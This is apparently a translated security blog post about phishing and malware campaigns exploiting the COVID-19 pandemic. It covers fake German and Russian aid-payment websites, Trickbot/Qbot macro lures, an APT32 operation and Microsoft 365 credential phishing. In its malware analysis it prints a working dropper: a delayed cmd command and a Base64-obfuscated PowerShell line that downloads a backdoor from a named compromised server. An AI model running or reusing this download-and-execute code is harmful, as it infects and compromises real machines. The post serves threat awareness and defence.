Attackers continue to exploit the COVID-19 theme, creating more and more threats for users who are keenly interested in everything related to the epidemic. In a previous post, we already talked about what types of malware appeared in the wake of the coronavirus, and today we will talk about social engineering techniques that users in different countries have already encountered, including in Russia. General trends and examples - under the cut.
Remember last time we talked about how people readily read not only about coronavirus and the course of the epidemic, but also about financial support measures? Here is a good example. In the German state of North Rhine-Westphalia il NRW, a curious phishing attack was discovered. Attackers created copies of the website of the Ministry of Economics ( NRW Ministry of Economic Affairs), where anyone can make an application for financial assistance. Such a program really exists, and it turned out to be in the hands of scammers. Having received the personal data of their victims, they made an application already on the Ministry’s website, but indicated other bank details. According to official figures, 4 thousand such fake requests were made until the scheme was disclosed. As a result, $ 109 million intended for affected citizens fell into the hands of fraudsters.
Do you want a free test for COVID-19?
Another telling example of coronavirus phishing was found in emails. Messages have attracted the attention of users with a proposal to undergo free testing for coronavirus infection. In the attachment of these letters were instances of Trickbot / Qakbot / Qbot. And when those who wanted to check their health started to “fill out the attached form”, a malicious script was downloaded to the computer. And in order to avoid verification by the sandboxing method, the script started loading the main virus only after some time, when the security systems were convinced that no malicious activity was occurring.Convincing most users to enable macros was also easy. To do this, a standard trick was used, when to fill out the questionnaire you first need to enable macros, which means you need to run the VBA script.
As you can see, the VBA script is specially masked from antiviruses.
Windows has a wait function when the application waits for / T <seconds> before accepting the “Yes” answer by default. In our case, the script waited 65 seconds before deleting temporary files: And in the process of waiting, malware was downloaded. To do this, a special PowerShell script was launched:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
After decoding the Base64 value, the PowerShell script loads the backdoor located on the previously hacked web server from Germany:http://automatischer-staubsauger.com/feature/777777.png
and saves it under the name:C:\Users\Public\tmpdir\file1.exe
The folder ‘C:\Users\Public\tmpdir’is deleted when the file 'tmps1.bat' is run, which contains the commandcmd /c mkdir ""C:\Users\Public\tmpdir"".Targeted attack on government agencies
In addition, FireEye analysts recently reported on a targeted attack by APT32 aimed at Wuhan government structures, as well as the Chinese Ministry of Emergency Management. One of the distributed RTFs contained a link to an article from the New York Times entitled Coronavirus Live Updates: China is Tracking Travelers From Hubei . However, when reading it, the download of malware occurred (FireEye analysts identified the instance as METALJACK).Interestingly, at the time of detection, none of the antiviruses detected this instance according to Virustotal.
When official sites “lie”
The brightest example of a phishing attack happened in Russia just the other day. The reason for this was the appointment of the long-awaited allowance for children aged 3 to 16 years. When the start of accepting applications was announced on May 12, 2020, millions rushed to the State Services website for the long-awaited help and brought down the portal no worse than a professional DDoS attack. When the president said that “State services could not cope with the flow of applications,” they started talking about the fact that an alternative site for accepting applications had begun to work.
The problem is that several sites have earned at once, and while one, the real one at posobie16.gosuslugi.ru, really accepts applications, dozens more collect personal data of trusting users .Colleagues from HeartInform found about 30 new fraudulent domains in the .ru zone. Infosecurity a Softline Company have tracked over 70 similar fake public services sites since early April. Their creators manipulate familiar symbols, and also use combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie and so on.Agiotage and Social Engineering
All these examples only confirm that attackers successfully monetize the theme of coronavirus. And the higher the social tension and the more unclear questions, the greater the chance of fraudsters to steal important data, force people to give their money on their own, or simply hack more computers.And given that the pandemic made potentially unprepared people to work from home in large numbers, not only personal, but also corporate data are at risk. For example, recently users of Microsoft 365 (formerly Office 365) have also been subjected to a phishing attack. People massively received voice “missed” messages in the attachments to letters. However, in fact, the files were an HTML page that sent the victims of the attack to the fake Microsoft 365 login page. As a result - loss of access and compromise of all data from the account.